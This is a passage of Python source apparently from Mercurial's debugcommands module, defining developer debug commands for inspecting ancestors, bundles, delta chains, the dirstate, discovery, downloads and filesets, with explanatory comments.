# convenience alias for releasing locks acquired via lockmod
release = lockmod.release

# command table; the @command decorators below register each debug command
command = registrar.command()
@command('debugancestor', [], _('[INDEX] REV1 REV2'), optionalrepo=True)
def debugancestor(ui, repo, *args):
    """find the ancestor revision of two revisions in a given index"""
    argcount = len(args)
    if argcount == 3:
        # explicit index file given; no repository required
        index, rev1, rev2 = args
        rlog = revlog.revlog(vfsmod.vfs(encoding.getcwd(), audit=False), index)
        resolve = rlog.lookup
    elif argcount == 2:
        # use the current repository's changelog
        if not repo:
            raise error.Abort(_('there is no Mercurial repository here '
                                '(.hg not found)'))
        rev1, rev2 = args
        rlog = repo.changelog
        resolve = repo.lookup
    else:
        raise error.Abort(_('either two or three arguments required'))
    ancestor = rlog.ancestor(resolve(rev1), resolve(rev2))
    ui.write('%d:%s\n' % (rlog.rev(ancestor), hex(ancestor)))
@command('debugapplystreamclonebundle', [], 'FILE')
def debugapplystreamclonebundle(ui, repo, fname):
    """apply a stream clone bundle file"""
    fh = hg.openpath(ui, fname)
    bundle = exchange.readbundle(ui, fh, fname)
    bundle.apply(repo)
@command('debugbuilddag',
    [('m', 'mergeable-file', None, _('add single file mergeable changes')),
    ('o', 'overwritten-file', None, _('add single file all revs overwrite')),
    ('n', 'new-file', None, _('add new file at each rev'))],
    _('[OPTION]... [TEXT]'))
def debugbuilddag(ui, repo, text=None,
                  mergeable_file=False,
                  overwritten_file=False,
                  new_file=False):
    """builds a repo with a given DAG from scratch in the current empty repo

    The description of the DAG is read from stdin if not given on the
    command line.

    Elements:

    - "+n" is a linear run of n nodes based on the current default parent
    - "." is a single node based on the current default parent
    - "$" resets the default parent to null (implied at the start);
      otherwise the default parent is always the last node created
    - "<p" sets the default parent to the backref p
    - "*p" is a fork at parent p, which is a backref
    - "*p1/p2" is a merge of parents p1 and p2, which are backrefs
    - "/p2" is a merge of the preceding node and p2
    - ":tag" defines a local tag for the preceding node
    - "@branch" sets the named branch for subsequent nodes
    - "#...\\n" is a comment up to the end of the line

    Whitespace between the above elements is ignored.

    A backref is either

    - a number n, which references the node curr-n, where curr is the current
      node, or
    - the name of a local tag you placed earlier using ":tag", or
    - empty to denote the default parent.

    All string valued-elements are either strictly alphanumeric, or must
    be enclosed in double quotes ("..."), with "\\" as escape character.
    """

    if text is None:
        ui.status(_("reading DAG from stdin\n"))
        text = ui.fin.read()

    # refuse to run on a non-empty repository
    cl = repo.changelog
    if len(cl) > 0:
        raise error.Abort(_('repository is not empty'))

    # first pass over the DAG: count 'n' (node) events for the progress bar
    total = 0
    for type, data in dagparser.parsedag(text):
        if type == 'n':
            total += 1

    if mergeable_file:
        linesperrev = 2
        # make a file with k lines per rev
        initialmergedlines = ['%d' % i
                              for i in pycompat.xrange(0, total * linesperrev)]
        initialmergedlines.append("")

    tags = []
    progress = ui.makeprogress(_('building'), unit=_('revisions'),
                               total=total)
    with progress, repo.wlock(), repo.lock(), repo.transaction("builddag"):
        at = -1                  # id of the most recently committed node
        atbranch = 'default'     # branch applied to subsequent nodes
        nodeids = []             # backref id -> commit node
        id = 0
        progress.update(id)
        # second pass: actually create commits/tags/branch switches
        for type, data in dagparser.parsedag(text):
            if type == 'n':
                ui.note(('node %s\n' % pycompat.bytestr(data)))
                id, ps = data

                files = []
                filecontent = {}

                p2 = None
                if mergeable_file:
                    fn = "mf"
                    p1 = repo[ps[0]]
                    if len(ps) > 1:
                        # merge: three-way merge the "mf" file from both parents
                        p2 = repo[ps[1]]
                        pa = p1.ancestor(p2)
                        base, local, other = [x[fn].data() for x in (pa, p1,
                                                                     p2)]
                        m3 = simplemerge.Merge3Text(base, local, other)
                        ml = [l.strip() for l in m3.merge_lines()]
                        ml.append("")
                    elif at > 0:
                        ml = p1[fn].data().split("\n")
                    else:
                        ml = initialmergedlines
                    # stamp this rev's id onto its dedicated line
                    ml[id * linesperrev] += " r%i" % id
                    mergedtext = "\n".join(ml)
                    files.append(fn)
                    filecontent[fn] = mergedtext

                if overwritten_file:
                    fn = "of"
                    files.append(fn)
                    filecontent[fn] = "r%i\n" % id

                if new_file:
                    fn = "nf%i" % id
                    files.append(fn)
                    filecontent[fn] = "r%i\n" % id

                if len(ps) > 1:
                    # merges carry forward the second parent's "nf*" files
                    if not p2:
                        p2 = repo[ps[1]]
                    for fn in p2:
                        if fn.startswith("nf"):
                            files.append(fn)
                            filecontent[fn] = p2[fn].data()

                def fctxfn(repo, cx, path):
                    if path in filecontent:
                        return context.memfilectx(repo, cx, path,
                                                  filecontent[path])
                    return None

                # translate backref ids into parent nodes for memctx
                if len(ps) == 0 or ps[0] < 0:
                    pars = [None, None]
                elif len(ps) == 1:
                    pars = [nodeids[ps[0]], None]
                else:
                    pars = [nodeids[p] for p in ps]
                cx = context.memctx(repo, pars, "r%i" % id, files, fctxfn,
                                    date=(id, 0),
                                    user="debugbuilddag",
                                    extra={'branch': atbranch})
                nodeid = repo.commitctx(cx)
                nodeids.append(nodeid)
                at = id
            elif type == 'l':
                # local tag for a previously created node
                id, name = data
                ui.note(('tag %s\n' % name))
                tags.append("%s %s\n" % (hex(repo.changelog.node(id)), name))
            elif type == 'a':
                # switch named branch for subsequent nodes
                ui.note(('branch %s\n' % data))
                atbranch = data
            progress.update(id)

    if tags:
        repo.vfs.write("localtags", "".join(tags))
def _debugchangegroup(ui, gen, all=None, indent=0, **opts):
    # Dump a changegroup's contents: with `all`, one line per delta chunk for
    # the changelog, manifest, and every filelog; otherwise just the changelog
    # node hashes. `indent` prefixes output (used when nested inside bundle2
    # part output). NOTE: `all` shadows the builtin, but renaming it would
    # change the keyword interface.
    indent_string = ' ' * indent
    if all:
        ui.write(("%sformat: id, p1, p2, cset, delta base, len(delta)\n")
                 % indent_string)

        def showchunks(named):
            # consume and print the current section's delta chunks
            ui.write("\n%s%s\n" % (indent_string, named))
            for deltadata in gen.deltaiter():
                node, p1, p2, cs, deltabase, delta, flags = deltadata
                ui.write("%s%s %s %s %s %s %d\n" %
                         (indent_string, hex(node), hex(p1), hex(p2),
                          hex(cs), hex(deltabase), len(delta)))

        # the stream must be consumed in order: changelog, manifest, filelogs
        chunkdata = gen.changelogheader()
        showchunks("changelog")
        chunkdata = gen.manifestheader()
        showchunks("manifest")
        for chunkdata in iter(gen.filelogheader, {}):
            fname = chunkdata['filename']
            showchunks(fname)
    else:
        if isinstance(gen, bundle2.unbundle20):
            raise error.Abort(_('use debugbundle2 for this file'))
        # header must be read (and discarded) before iterating the deltas
        chunkdata = gen.changelogheader()
        for deltadata in gen.deltaiter():
            node, p1, p2, cs, deltabase, delta, flags = deltadata
            ui.write("%s%s\n" % (indent_string, hex(node)))
def _debugobsmarkers(ui, part, indent=0, **opts):
    """display the obsolescence-marker version and markers in bundle 'part'

    Reads the whole part payload, decodes it, and prints one marker per
    line prefixed by 'indent' spaces.  An unknown encoding version is
    reported rather than raised.
    """
    opts = pycompat.byteskwargs(opts)
    data = part.read()
    indent_string = ' ' * indent
    try:
        version, markers = obsolete._readmarkers(data)
    except error.UnknownVersion as exc:
        # best effort: report the unsupported version instead of aborting
        msg = "%sunsupported version: %s (%d bytes)\n"
        msg %= indent_string, exc.version, len(data)
        ui.write(msg)
    else:
        msg = "%sversion: %d (%d bytes)\n"
        msg %= indent_string, version, len(data)
        ui.write(msg)
        fm = ui.formatter('debugobsolete', opts)
        # sort raw markers for deterministic output
        for rawmarker in sorted(markers):
            m = obsutil.marker(None, rawmarker)
            fm.startitem()
            fm.plain(indent_string)
            cmdutil.showmarker(fm, m)
        fm.end()
def _debugphaseheads(ui, data, indent=0):
    """print the phase heads encoded in 'data', one head per line

    Each line is '<hex node> <phase name>', prefixed by 'indent' spaces.
    """
    prefix = ' ' * indent
    headsbyphase = phases.binarydecode(data)
    for phase in phases.allphases:
        phasename = phases.phasenames[phase]
        for head in headsbyphase[phase]:
            ui.write(prefix)
            ui.write('%s %s\n' % (hex(head), phasename))
def _quasirepr(thing):
    """return a bytes repr of 'thing'; mappings get a key-sorted rendering

    Sorting the keys makes the output stable regardless of dict ordering.
    """
    if not isinstance(thing, (dict, util.sortdict, collections.OrderedDict)):
        return pycompat.bytestr(repr(thing))
    pairs = (b'%s: %s' % (k, thing[k]) for k in sorted(thing))
    return '{%s}' % b', '.join(pairs)
def _debugbundle2(ui, gen, all=None, **opts):
    """lists the contents of a bundle2

    Prints the stream parameters, then one line per part (optionally
    filtered by --part-type); known part payloads (changegroup,
    obsmarkers, phase-heads) are additionally dumped unless --quiet.
    """
    if not isinstance(gen, bundle2.unbundle20):
        raise error.Abort(_('not a bundle2 file'))
    ui.write(('Stream params: %s\n' % _quasirepr(gen.params)))
    # empty list means "no filter": show every part
    parttypes = opts.get(r'part_type', [])
    for part in gen.iterparts():
        if parttypes and part.type not in parttypes:
            continue
        msg = '%s -- %s (mandatory: %r)\n'
        ui.write((msg % (part.type, _quasirepr(part.params), part.mandatory)))
        if part.type == 'changegroup':
            # default to cg version '01' when the part does not say
            version = part.params.get('version', '01')
            cg = changegroup.getunbundler(version, part, 'UN')
            if not ui.quiet:
                _debugchangegroup(ui, cg, all=all, indent=4, **opts)
        if part.type == 'obsmarkers':
            if not ui.quiet:
                _debugobsmarkers(ui, part, indent=4, **opts)
        if part.type == 'phase-heads':
            if not ui.quiet:
                _debugphaseheads(ui, part, indent=4)
@command('debugbundle',
    [('a', 'all', None, _('show all details')),
     ('', 'part-type', [], _('show only the named part type')),
     ('', 'spec', None, _('print the bundlespec of the bundle'))],
    _('FILE'),
    norepo=True)
def debugbundle(ui, bundlepath, all=None, spec=None, **opts):
    """lists the contents of a bundle

    With --spec, only the bundlespec string is printed.  Bundle2 files
    are delegated to _debugbundle2; bundle1 files go straight to
    _debugchangegroup.
    """
    with hg.openpath(ui, bundlepath) as f:
        if spec:
            spec = exchange.getbundlespec(ui, f)
            ui.write('%s\n' % spec)
            return
        gen = exchange.readbundle(ui, f, bundlepath)
        if isinstance(gen, bundle2.unbundle20):
            return _debugbundle2(ui, gen, all=all, **opts)
        _debugchangegroup(ui, gen, all=all, **opts)
@command('debugcapabilities',
    [], _('PATH'),
    norepo=True)
def debugcapabilities(ui, path, **opts):
    """lists the capabilities of a remote peer

    Prints the wire-protocol capabilities first, then (if advertised)
    the bundle2 capabilities with their values, all sorted.
    """
    opts = pycompat.byteskwargs(opts)
    peer = hg.peer(ui, opts, path)
    caps = peer.capabilities()
    ui.write(('Main capabilities:\n'))
    for c in sorted(caps):
        ui.write(('  %s\n') % c)
    b2caps = bundle2.bundle2caps(peer)
    if b2caps:
        ui.write(('Bundle2 capabilities:\n'))
        # iteritems: this file still supports Python 2 dict iteration
        for key, values in sorted(b2caps.iteritems()):
            ui.write(('  %s\n') % key)
            for v in values:
                ui.write(('    %s\n') % v)
@command('debugcheckstate', [], '')
def debugcheckstate(ui, repo):
    """validate the correctness of the current dirstate

    Cross-checks every dirstate entry against the manifests of the two
    dirstate parents, warning about each inconsistency, and aborts if
    any were found.
    """
    parent1, parent2 = repo.dirstate.parents()
    m1 = repo[parent1].manifest()
    m2 = repo[parent2].manifest()
    errors = 0
    for f in repo.dirstate:
        state = repo.dirstate[f]
        # 'n'ormal/'r'emoved entries must exist in the first parent
        if state in "nr" and f not in m1:
            ui.warn(_("%s in state %s, but not in manifest1\n") % (f, state))
            errors += 1
        # 'a'dded entries must not already be tracked
        if state in "a" and f in m1:
            ui.warn(_("%s in state %s, but also in manifest1\n") % (f, state))
            errors += 1
        # 'm'erged entries must come from at least one parent
        if state in "m" and f not in m1 and f not in m2:
            ui.warn(_("%s in state %s, but not in either manifest\n") %
                    (f, state))
            errors += 1
    for f in m1:
        state = repo.dirstate[f]
        if state not in "nrm":
            ui.warn(_("%s in manifest1, but listed as state %s") % (f, state))
            errors += 1
    if errors:
        # use a distinct local name: assigning to 'error' here shadowed
        # the 'error' module, breaking the error.Abort lookup below
        errstr = _(".hg/dirstate inconsistent with current parent's manifest")
        raise error.Abort(errstr)
@command('debugcolor',
    [('', 'style', None, _('show all configured styles'))],
    'hg debugcolor')
def debugcolor(ui, repo, **opts):
    """show available color, effects or style"""
    ui.write(('color mode: %s\n') % stringutil.pprint(ui._colormode))
    # --style lists configured styles; otherwise list available colors
    shower = _debugdisplaystyle if opts.get(r'style') else _debugdisplaycolor
    return shower(ui)
def _debugdisplaycolor(ui):
    """list every available color/effect, each rendered in its own style"""
    # work on a copy so the caller's ui styles are left untouched
    ui = ui.copy()
    ui._styles.clear()
    for effect in color._activeeffects(ui).keys():
        ui._styles[effect] = effect
    if ui._terminfoparams:
        # terminfo mode: also expose the user-defined color/terminfo keys,
        # stripping the 'color.' / 'terminfo.' prefixes
        for k, v in ui.configitems('color'):
            if k.startswith('color.'):
                ui._styles[k] = k[6:]
            elif k.startswith('terminfo.'):
                ui._styles[k] = k[9:]
    ui.write(_('available colors:\n'))
    # sort label with a '_' after the other to group '_background' entry.
    items = sorted(ui._styles.items(),
                   key=lambda i: ('_' in i[0], i[0], i[1]))
    for colorname, label in items:
        ui.write(('%s\n') % colorname, label=label)
def _debugdisplaystyle(ui):
    """list every configured style label with its rendered effects"""
    ui.write(_('available style:\n'))
    if not ui._styles:
        return
    # pad labels so the effect columns line up
    width = max(len(name) for name in ui._styles)
    for name, effects in sorted(ui._styles.items()):
        ui.write('%s' % name, label=name)
        if effects:
            ui.write(': ')
            ui.write(' ' * (max(0, width - len(name))))
            rendered = [ui.label(e, e) for e in effects.split()]
            ui.write(', '.join(rendered))
        ui.write('\n')
@command('debugcreatestreamclonebundle', [], 'FILE')
def debugcreatestreamclonebundle(ui, repo, fname):
    """create a stream clone bundle file

    Stream bundles are special bundles that are essentially archives of
    revlog files. They are commonly used for cloning very quickly.
    """
    # TODO we may want to turn this into an abort when this functionality
    # is moved into `hg bundle`.
    if phases.hassecret(repo):
        # stream bundles copy revlogs wholesale, so secret changesets leak
        ui.warn(_('(warning: stream clone bundle will contain secret '
                  'revisions)\n'))
    requirements, gen = streamclone.generatebundlev1(repo)
    changegroup.writechunks(ui, gen, fname)
    ui.write(_('bundle requirements: %s\n') % ', '.join(sorted(requirements)))
@command('debugdag',
    [('t', 'tags', None, _('use tags as labels')),
     ('b', 'branches', None, _('annotate with branch names')),
     ('', 'dots', None, _('use dots for runs')),
     ('s', 'spaces', None, _('separate elements by spaces'))],
    _('[OPTION]... [FILE [REV]...]'),
    optionalrepo=True)
def debugdag(ui, repo, file_=None, *revs, **opts):
    """format the changelog or an index DAG as a concise textual description

    If you pass a revlog index, the revlog's DAG is emitted. If you list
    revision numbers, they get labeled in the output as rN.
    Otherwise, the changelog DAG of the current repo is emitted.
    """
    spaces = opts.get(r'spaces')
    dots = opts.get(r'dots')
    if file_:
        # explicit revlog file: emit its DAG, labeling the listed revs
        rlog = revlog.revlog(vfsmod.vfs(encoding.getcwd(), audit=False),
                             file_)
        revs = set((int(r) for r in revs))
        def events():
            # yield 'n' (node) events, filtering out null (-1) parents,
            # plus an 'l' (label) event for each requested rev
            for r in rlog:
                yield 'n', (r, list(p for p in rlog.parentrevs(r)
                                    if p != -1))
                if r in revs:
                    yield 'l', (r, "r%i" % r)
    elif repo:
        # default: walk the repo changelog
        cl = repo.changelog
        tags = opts.get(r'tags')
        branches = opts.get(r'branches')
        if tags:
            # rev -> list of tag names, for 'l' events below
            labels = {}
            for l, n in repo.tags().items():
                labels.setdefault(cl.rev(n), []).append(l)
        def events():
            b = "default"
            for r in cl:
                if branches:
                    # emit an 'a' (annotation) event on branch changes
                    newb = cl.read(cl.node(r))[5]['branch']
                    if newb != b:
                        yield 'a', newb
                        b = newb
                yield 'n', (r, list(p for p in cl.parentrevs(r)
                                    if p != -1))
                if tags:
                    ls = labels.get(r)
                    if ls:
                        for l in ls:
                            yield 'l', (r, l)
    else:
        raise error.Abort(_('need repo for changelog dag'))
    for line in dagparser.dagtextlines(events(),
                                       addspaces=spaces,
                                       wraplabels=True,
                                       wrapannotations=True,
                                       wrapnonlinear=dots,
                                       usedots=dots,
                                       maxlinewidth=70):
        ui.write(line)
        ui.write("\n")
@command('debugdata', cmdutil.debugrevlogopts, _('-c|-m|FILE REV'))
def debugdata(ui, repo, file_, rev=None, **opts):
    """dump the contents of a data file revision"""
    opts = pycompat.byteskwargs(opts)
    if opts.get('changelog') or opts.get('manifest') or opts.get('dir'):
        # with -c/-m/--dir the single positional argument is the revision,
        # not a file: shift it into 'rev'
        if rev is not None:
            raise error.CommandError('debugdata', _('invalid arguments'))
        file_, rev = None, file_
    elif rev is None:
        raise error.CommandError('debugdata', _('invalid arguments'))
    r = cmdutil.openstorage(repo, 'debugdata', file_, opts)
    try:
        # raw=True: emit the stored bytes without flag processing
        ui.write(r.revision(r.lookup(rev), raw=True))
    except KeyError:
        raise error.Abort(_('invalid revision identifier %s') % rev)
@command('debugdate',
    [('e', 'extended', None, _('try extended date formats'))],
    _('[-e] DATE [RANGE]'),
    norepo=True, optionalrepo=True)
def debugdate(ui, date, range=None, **opts):
    """parse and display a date"""
    # -e widens the set of accepted input formats
    if opts[r"extended"]:
        parsed = dateutil.parsedate(date, util.extendeddateformats)
    else:
        parsed = dateutil.parsedate(date)
    ui.write(("internal: %d %d\n") % parsed)
    ui.write(("standard: %s\n") % dateutil.datestr(parsed))
    if range:
        # check whether the parsed timestamp falls inside RANGE
        matchfn = dateutil.matchdate(range)
        ui.write(("match: %s\n") % matchfn(parsed[0]))
@command('debugdeltachain',
    cmdutil.debugrevlogopts + cmdutil.formatteropts,
    _('-c|-m|FILE'),
    optionalrepo=True)
def debugdeltachain(ui, repo, file_=None, **opts):
    """dump information about delta chains in a revlog

    Output can be templatized. Available template keywords are:
    :``rev``:       revision number
    :``chainid``:   delta chain identifier (numbered by unique base)
    :``chainlen``:  delta chain length to this revision
    :``prevrev``:   previous revision in delta chain
    :``deltatype``: role of delta / how it was computed
    :``compsize``:  compressed size of revision
    :``uncompsize``: uncompressed size of revision
    :``chainsize``: total size of compressed revisions in chain
    :``chainratio``: total chain size divided by uncompressed revision size
                    (new delta chains typically start at ratio 2.00)
    :``lindist``:   linear distance from base revision in delta chain to end
                    of this revision
    :``extradist``: total size of revisions not part of this delta chain from
                    base of delta chain to end of this revision; a measurement
                    of how much extra data we need to read/seek across to read
                    the delta chain for this revision
    :``extraratio``: extradist divided by chainsize; another representation of
                    how much unrelated data is needed to load this delta chain

    If the repository is configured to use the sparse read, additional keywords
    are available:
    :``readsize``:  total size of data read from the disk for a revision
                    (sum of the sizes of all the blocks)
    :``largestblock``: size of the largest block of data read from the disk
    :``readdensity``: density of useful bytes in the data read from the disk
    :``srchunks``:  in how many data hunks the whole revision would be read

    The sparse read can be enabled with experimental.sparse-read = True
    """
    opts = pycompat.byteskwargs(opts)
    r = cmdutil.openrevlog(repo, 'debugdeltachain', file_, opts)
    index = r.index
    # bind hot revlog accessors to locals for the per-rev loop below
    start = r.start
    length = r.length
    generaldelta = r.version & revlog.FLAG_GENERALDELTA
    withsparseread = getattr(r, '_withsparseread', False)
    def revinfo(rev):
        # index entry layout used here: e[1]=compressed size,
        # e[2]=uncompressed size, e[3]=delta base rev, e[5]/e[6]=parent revs
        e = index[rev]
        compsize = e[1]
        uncompsize = e[2]
        chainsize = 0
        if generaldelta:
            # classify the delta base relative to this rev
            if e[3] == e[5]:
                deltatype = 'p1'
            elif e[3] == e[6]:
                deltatype = 'p2'
            elif e[3] == rev - 1:
                deltatype = 'prev'
            elif e[3] == rev:
                deltatype = 'base'
            else:
                deltatype = 'other'
        else:
            # without generaldelta, the base is either self or the
            # previous revision
            if e[3] == rev:
                deltatype = 'base'
            else:
                deltatype = 'prev'
        chain = r._deltachain(rev)[0]
        for iterrev in chain:
            e = index[iterrev]
            chainsize += e[1]
        return compsize, uncompsize, deltatype, chain, chainsize
    fm = ui.formatter('debugdeltachain', opts)
    fm.plain('    rev  chain# chainlen     prev   delta       '
             'size    rawsize  chainsize     ratio   lindist extradist '
             'extraratio')
    if withsparseread:
        fm.plain('   readsize largestblk rddensity srchunks')
    fm.plain('\n')
    # chain base rev -> 1-based chain id, assigned in discovery order
    chainbases = {}
    for rev in r:
        comp, uncomp, deltatype, chain, chainsize = revinfo(rev)
        chainbase = chain[0]
        chainid = chainbases.setdefault(chainbase, len(chainbases) + 1)
        basestart = start(chainbase)
        revstart = start(rev)
        # on-disk span from the chain base to the end of this revision
        lineardist = revstart + comp - basestart
        extradist = lineardist - chainsize
        try:
            prevrev = chain[-2]
        except IndexError:
            # single-entry chain: no previous revision
            prevrev = -1
        # guard the ratios against zero denominators
        if uncomp != 0:
            chainratio = float(chainsize) / float(uncomp)
        else:
            chainratio = chainsize
        if chainsize != 0:
            extraratio = float(extradist) / float(chainsize)
        else:
            extraratio = extradist
        fm.startitem()
        fm.write('rev chainid chainlen prevrev deltatype compsize '
                 'uncompsize chainsize chainratio lindist extradist '
                 'extraratio',
                 '%7d %7d %8d %8d %7s %10d %10d %10d %9.5f %9d %9d %10.5f',
                 rev, chainid, len(chain), prevrev, deltatype, comp,
                 uncomp, chainsize, chainratio, lineardist, extradist,
                 extraratio,
                 rev=rev, chainid=chainid, chainlen=len(chain),
                 prevrev=prevrev, deltatype=deltatype, compsize=comp,
                 uncompsize=uncomp, chainsize=chainsize,
                 chainratio=chainratio, lindist=lineardist,
                 extradist=extradist, extraratio=extraratio)
        if withsparseread:
            readsize = 0
            largestblock = 0
            srchunks = 0
            # measure how the sliced read would touch the disk
            for revschunk in deltautil.slicechunk(r, chain):
                srchunks += 1
                blkend = start(revschunk[-1]) + length(revschunk[-1])
                blksize = blkend - start(revschunk[0])
                readsize += blksize
                if largestblock < blksize:
                    largestblock = blksize
            if readsize:
                readdensity = float(chainsize) / float(readsize)
            else:
                readdensity = 1
            fm.write('readsize largestblock readdensity srchunks',
                     ' %10d %10d %9.5f %8d',
                     readsize, largestblock, readdensity, srchunks,
                     readsize=readsize, largestblock=largestblock,
                     readdensity=readdensity, srchunks=srchunks)
        fm.plain('\n')
    fm.end()
@command('debugdirstate|debugstate',
    [('', 'nodates', None, _('do not display the saved mtime (DEPRECATED)')),
     ('', 'dates', True, _('display the saved mtime')),
     ('', 'datesort', None, _('sort by saved mtime'))],
    _('[OPTION]...'))
def debugstate(ui, repo, **opts):
    """show the contents of the current dirstate"""
    nodates = not opts[r'dates']
    # --nodates is the deprecated spelling of --no-dates
    if opts.get(r'nodates') is not None:
        nodates = True
    datesort = opts.get(r'datesort')
    timestr = ""
    if datesort:
        keyfunc = lambda x: (x[1][3], x[0]) # sort by mtime, then by filename
    else:
        keyfunc = None # sort by filename
    # each entry is (state, mode, size, mtime)
    for file_, ent in sorted(repo.dirstate._map.iteritems(), key=keyfunc):
        if ent[3] == -1:
            # mtime of -1 means "unset" (needs a status check)
            timestr = 'unset               '
        elif nodates:
            timestr = 'set                 '
        else:
            timestr = time.strftime(r"%Y-%m-%d %H:%M:%S ",
                                    time.localtime(ent[3]))
            timestr = encoding.strtolocal(timestr)
        if ent[1] & 0o20000:
            # S_IFLNK bit set in the stored mode: a symlink
            mode = 'lnk'
        else:
            mode = '%3o' % (ent[1] & 0o777 & ~util.umask)
        ui.write("%c %s %10d %s%s\n" % (ent[0], mode, ent[2], timestr, file_))
    for f in repo.dirstate.copies():
        ui.write(_("copy: %s -> %s\n") % (repo.dirstate.copied(f), f))
@command('debugdiscovery',
    [('', 'old', None, _('use old-style discovery')),
     ('', 'nonheads', None,
      _('use old-style discovery with non-heads included')),
     ('', 'rev', [], 'restrict discovery to this set of revs'),
    ] + cmdutil.remoteopts,
    _('[--rev REV] [OTHER]'))
def debugdiscovery(ui, repo, remoteurl="default", **opts):
    """runs the changeset discovery protocol in isolation"""
    opts = pycompat.byteskwargs(opts)
    remoteurl, branches = hg.parseurl(ui.expandpath(remoteurl))
    remote = hg.peer(repo, opts, remoteurl)
    ui.status(_('comparing with %s\n') % util.hidepassword(remoteurl))
    # make sure tests are repeatable
    random.seed(12323)
    def doit(pushedrevs, remoteheads, remote=remote):
        if opts.get('old'):
            # legacy tree-walking discovery protocol
            if not util.safehasattr(remote, 'branches'):
                # enable in-client legacy support
                remote = localrepo.locallegacypeer(remote.local())
            common, _in, hds = treediscovery.findcommonincoming(repo, remote,
                                                                force=True)
            common = set(common)
            if not opts.get('nonheads'):
                ui.write(("unpruned common: %s\n") %
                         " ".join(sorted(short(n) for n in common)))
                # reduce the common set to its heads
                clnode = repo.changelog.node
                common = repo.revs('heads(::%ln)', common)
                common = {clnode(r) for r in common}
        else:
            # modern set-based discovery
            nodes = None
            if pushedrevs:
                revs = scmutil.revrange(repo, pushedrevs)
                nodes = [repo[r].node() for r in revs]
            common, any, hds = setdiscovery.findcommonheads(ui, repo, remote,
                                                            ancestorsof=nodes)
        common = set(common)
        rheads = set(hds)
        lheads = set(repo.heads())
        ui.write(("common heads: %s\n") %
                 " ".join(sorted(short(n) for n in common)))
        if lheads <= common:
            ui.write(("local is subset\n"))
        elif rheads <= common:
            ui.write(("remote is subset\n"))
    remoterevs, _checkout = hg.addbranchrevs(repo, remote, branches, revs=None)
    localrevs = opts['rev']
    doit(localrevs, remoterevs)
# buffer size (4 KiB) used by debugdownload for reads and output buffering
_chunksize = 4 << 10
@command('debugdownload',
    [
        ('o', 'output', '', _('path')),
    ],
    optionalrepo=True)
def debugdownload(ui, repo, url, output=None, **opts):
    """download a resource using Mercurial logic and config

    The body is streamed in _chunksize pieces to the --output file, or
    to the ui when no output path is given.
    """
    fh = urlmod.open(ui, url, output)
    dest = ui
    if output:
        dest = open(output, "wb", _chunksize)
    try:
        data = fh.read(_chunksize)
        while data:
            dest.write(data)
            data = fh.read(_chunksize)
    finally:
        # close the response handle too (it was previously leaked),
        # then the local output file if we opened one
        fh.close()
        if output:
            dest.close()
@command('debugextensions', cmdutil.formatteropts, [], optionalrepo=True)
def debugextensions(ui, repo, **opts):
    '''show information about active extensions

    One item per loaded extension; --verbose adds source location,
    bundled status, tested-with versions and bug-report link.
    '''
    opts = pycompat.byteskwargs(opts)
    exts = extensions.extensions(ui)
    hgver = util.version()
    fm = ui.formatter('debugextensions', opts)
    for extname, extmod in sorted(exts, key=operator.itemgetter(0)):
        isinternal = extensions.ismoduleinternal(extmod)
        extsource = pycompat.fsencode(extmod.__file__)
        if isinternal:
            exttestedwith = []  # never expose magic string to users
        else:
            exttestedwith = getattr(extmod, 'testedwith', '').split()
        extbuglink = getattr(extmod, 'buglink', None)
        fm.startitem()
        if ui.quiet or ui.verbose:
            fm.write('name', '%s\n', extname)
        else:
            fm.write('name', '%s', extname)
            # in normal mode, append a compatibility note on the same line
            if isinternal or hgver in exttestedwith:
                fm.plain('\n')
            elif not exttestedwith:
                fm.plain(_(' (untested!)\n'))
            else:
                lasttestedversion = exttestedwith[-1]
                fm.plain(' (%s!)\n' % lasttestedversion)
        fm.condwrite(ui.verbose and extsource, 'source',
                     _('  location: %s\n'), extsource or "")
        if ui.verbose:
            fm.plain(_('  bundled: %s\n') % ['no', 'yes'][isinternal])
        fm.data(bundled=isinternal)
        fm.condwrite(ui.verbose and exttestedwith, 'testedwith',
                     _('  tested with: %s\n'),
                     fm.formatlist(exttestedwith, name='ver'))
        fm.condwrite(ui.verbose and extbuglink, 'buglink',
                     _('  bug reporting: %s\n'), extbuglink or "")
    fm.end()
@command('debugfileset',
    [('r', 'rev', '', _('apply the filespec on this revision'), _('REV')),
     ('', 'all-files', False,
      _('test files from all revisions and working directory')),
     ('s', 'show-matcher', None,
      _('print internal representation of matcher')),
     ('p', 'show-stage', [],
      _('print parsed tree at the given stage'), _('NAME'))],
    _('[-r REV] [--all-files] [OPTION]... FILESPEC'))
def debugfileset(ui, repo, expr, **opts):
    '''parse and apply a fileset specification

    The expression is run through the parse/analyze/optimize pipeline
    (optionally printing intermediate trees via --show-stage), turned
    into a matcher, and then applied to the selected set of files.
    '''
    from . import fileset
    fileset.symbols # force import of fileset so we have predicates to optimize
    opts = pycompat.byteskwargs(opts)
    ctx = scmutil.revsingle(repo, opts.get('rev'), None)
    # ordered processing pipeline; each stage transforms the tree
    stages = [
        ('parsed', pycompat.identity),
        ('analyzed', filesetlang.analyze),
        ('optimized', filesetlang.optimize),
    ]
    stagenames = set(n for n, f in stages)
    showalways = set()
    if ui.verbose and not opts['show_stage']:
        # show parsed tree by --verbose (deprecated)
        showalways.add('parsed')
    if opts['show_stage'] == ['all']:
        showalways.update(stagenames)
    else:
        for n in opts['show_stage']:
            if n not in stagenames:
                raise error.Abort(_('invalid stage name: %s') % n)
        showalways.update(opts['show_stage'])
    tree = filesetlang.parse(expr)
    for n, f in stages:
        tree = f(tree)
        if n in showalways:
            # skip the header when only the implicit 'parsed' dump is shown
            if opts['show_stage'] or n != 'parsed':
                ui.write(("* %s:\n") % n)
            ui.write(filesetlang.prettyformat(tree), "\n")
    # collect the candidate file names the matcher will be tested against
    files = set()
    if opts['all_files']:
        for r in repo:
            c = repo[r]
            files.update(c.files())
            files.update(c.substate)
    if opts['all_files'] or ctx.rev() is None:
        # include working-directory files (even unknown/ignored ones)
        wctx = repo[None]
        files.update(repo.dirstate.walk(scmutil.matchall(repo),
                                        subrepos=list(wctx.substate),
                                        unknown=True, ignored=True))
        files.update(wctx.substate)
    else:
        files.update(ctx.files())
        files.update(ctx.substate)
    m = ctx.matchfileset(expr)
    if opts['show_matcher'] or (opts['show_matcher'] is None and ui.verbose):
        ui.write(('* matcher:\n'), stringutil.prettyrepr(m), '\n')
    for f in sorted(files):
        if not m(f):
            continue
        ui.write("%s\n" % f)
@command('debugformat',
    [] + cmdutil.formatteropts)
def debugformat(ui, repo, **opts):
    """display format information about the current repository

    Use --verbose to get extra information about current config value and
    Mercurial default."""
    opts = pycompat.byteskwargs(opts)
    # pad the name column to the longest variant name (at least the header)
